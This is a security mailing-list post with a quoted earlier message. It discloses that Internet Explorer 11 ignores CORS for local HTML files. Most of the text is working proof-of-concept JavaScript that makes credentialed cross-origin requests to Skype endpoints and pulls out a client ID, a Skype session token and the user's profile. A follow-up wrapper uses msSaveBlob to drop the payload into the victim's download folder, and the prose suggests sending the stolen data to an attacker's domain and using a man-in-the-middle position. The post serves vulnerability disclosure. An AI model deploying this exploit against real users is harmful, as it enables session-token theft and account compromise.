Re: IE11 is not following CORS specification for local files

[Ricardo Iramar dos Santos <riramar () gmail com>]

I did a small improvement in this attack.
Using IE File API
(https://msdn.microsoft.com/en-us/library/hh772315(v=vs.85).aspx) an
attacker would be able to create a web page with the content below and
send to a victim.
A local file with the same content that I sent previously would be
created on download default folder.
If the victim perform the three following clicks (Save, Open and Allow
blocked content) an attacker would be able to perform any request to
any domain and send the content to a domain which he/she has control.
If the attacker is a MitM position this could be more intersting.
Since the attacker could inject this content in a HTTP page and the
victim will tend to relay on that.
Next step would be force the victim to click on Save, Open and Allow
blocked content buttons.

<html>
<body>
<h1>Saving Files Locally</h1>
<script>
  if (typeof Blob !== "undefined") {
    demoBlobs();
  }
  function demoBlobs(){
    var blob = new Blob(["<html><script>function
createCORSRequest(method, url) {  var xhr = new XMLHttpRequest();  if
(\"withCredentials\" in xhr) {    xhr.open(method, url, true);  } else
if (typeof XDomainRequest != \"undefined\") {    xhr = new
XDomainRequest();    xhr.open(method, url);  } else {    xhr = null;
}  return xhr;}function getClientID(text) {  return
text.match('client_id:\"([^\"]*)\",redirect_uri')[1];}function
getToken(text) {  return text.match('<input type=\"hidden\"
name=\"skypetoken\" value=\"([^\"]*)\"\/>')[1];}function
makeCorsRequest() {  var url0 =
'https:\/\/s4w.cdn.skype.com\/0-224-0\/js\/index.js';  var xhr0 =
createCORSRequest('GET', url0 );  if (!xhr0) {alert('CORS not
supported');return;  }  xhr0.withCredentials = true;  xhr0.onload =
function() {var text0 = xhr0.responseText;var clientid =
getClientID(text0);alert('Client ID: ' + clientid);  var url1 =
'https:\/\/login.skype.com\/login?client_id='+clientid+'&redirect_uri=https%3A%2F%2Fweb.skype.com%2F%3Fintcmp%3Daccountweb-_-uktrybeta';
 var xhr1 = createCORSRequest('GET', url1);  if (!xhr1) {alert('CORS
not supported');return;  }  xhr1.withCredentials = true;  xhr1.onload
= function() {var text1 = xhr1.responseText;var token =
getToken(text1);alert('Skype Token: ' + token);  var url2 =
'https:\/\/api.skype.com\/users\/self\/profile';  var xhr2 =
createCORSRequest('GET', url2);  if (!xhr2) {alert('CORS not
supported');return;  }  xhr2.withCredentials = true;
xhr2.setRequestHeader(\"X-Skypetoken\", token);  xhr2.onload =
function() {var text2 = xhr2.responseText;alert('User Profile: ' +
text2);  };  xhr2.onerror = function() {alert('Woops, there was an
error making the request.');  };  xhr2.send();  };  xhr1.onerror =
function() {alert('Woops, there was an error making the request.');
};  xhr1.send();  };  xhr0.onerror = function() {alert('Woops, there
was an error making the request.');  };  xhr0.send();}<\/script><body
onload=\"makeCorsRequest()\"><\/body><\/html>"]);
    window.navigator.msSaveBlob(blob, 'testFile.htm');
  }
</script>
</body>
</html>

On Wed, Sep 21, 2016 at 10:10 PM, Ricardo Iramar dos Santos
<riramar () gmail com> wrote:
> IE11 is not following CORS specification for local files like Chrome
> and Firefox.
> I've contacted Microsoft and they say this is not a security issue so
> I'm sharing it.
> From my tests IE11 is not following CORS specifications for local
> files as supposed to be.
> In order to prove I've created a malicious html file with the content below.
>
> <html>
> <script>
> function createCORSRequest(method, url) {
>   var xhr = new XMLHttpRequest();
>   if ("withCredentials" in xhr) {
>     xhr.open(method, url, true);
>   } else if (typeof XDomainRequest != "undefined") {
>     xhr = new XDomainRequest();
>     xhr.open(method, url);
>   } else {
>     xhr = null;
>   }
>   return xhr;
> }
>
> function getClientID(text) {
>   return text.match('client_id:"([^"]*)",redirect_uri')[1];
> }
>
> function getToken(text) {
>   return text.match('<input type="hidden" name="skypetoken"
> value="([^"]*)"/>')[1];
> }
>
> function makeCorsRequest() {
>
>   var url0 = 'https://s4w.cdn.skype.com/0-224-0/js/index.js&apos;;
>
>   var xhr0 = createCORSRequest('GET', url0 );
>   if (!xhr0) {
> alert('CORS not supported');
> return;
>   }
>
>   xhr0.withCredentials = true;
>
>   xhr0.onload = function() {
> var text0 = xhr0.responseText;
> var clientid = getClientID(text0);
> alert('Client ID: ' + clientid);
>
>   var url1 = 
> 'https://login.skype.com/login?client_id='+clientid+'&redirect_uri=https%3A%2F%2Fweb.skype.com%2F%3Fintcmp%3Daccountweb-_-uktrybeta&apos;;
>
>   var xhr1 = createCORSRequest('GET', url1);
>   if (!xhr1) {
> alert('CORS not supported');
> return;
>   }
>
>   xhr1.withCredentials = true;
>
>   xhr1.onload = function() {
> var text1 = xhr1.responseText;
> var token = getToken(text1);
> alert('Skype Token: ' + token);
>   var url2 = 'https://api.skype.com/users/self/profile&apos;;
>
>   var xhr2 = createCORSRequest('GET', url2);
>   if (!xhr2) {
> alert('CORS not supported');
> return;
>   }
>
>   xhr2.withCredentials = true;
>   xhr2.setRequestHeader("X-Skypetoken", token);
>
>   xhr2.onload = function() {
> var text2 = xhr2.responseText;
> alert('User Profile: ' + text2);
>   };
>
>   xhr2.onerror = function() {
> alert('Woops, there was an error making the request.');
>   };
>
>   xhr2.send();
>   };
>
>   xhr1.onerror = function() {
> alert('Woops, there was an error making the request.');
>   };
>
>   xhr1.send();
>   };
>
>   xhr0.onerror = function() {
> alert('Woops, there was an error making the request.');
>   };
>
>   xhr0.send();
>
> }
> </script>
> <body>
> <button onclick="makeCorsRequest()">Click me</button>
> </body>
> </html>
>
> The file above will be able to get an skype token and perform get on
> the user profile. Instead of using alert() function I could send this
> information to a domain that I have control.
> Of course the victim needs to open the file from his local drive or
> maybe another application can open an IE instance.
> If the user is logged on a Microsoft account and open the html file
> with the content above with onload function instead of onclick I'd be
> able to get his profile data.
> This is a simple scenario. An attacker would be able to get any data
> from any domain that do not require a unique ID (e.g. CSRF token)
> which the attacker doesn't have and is unable to get.
> If you do the same test on Chrome or Firefox the browser will follow
> CORS specification and block the response content since no CORS
> headers is present in the response.
> I tested on IE11 running on Win7SP1  with all security patches and it
> worked. On Win10 didn't work. I didn't test in any server with CORS
> enabled.
> If you think in another malicious scenario please let me know.
>
> Thanks!
> Ricardo Iramar



This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now! 
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------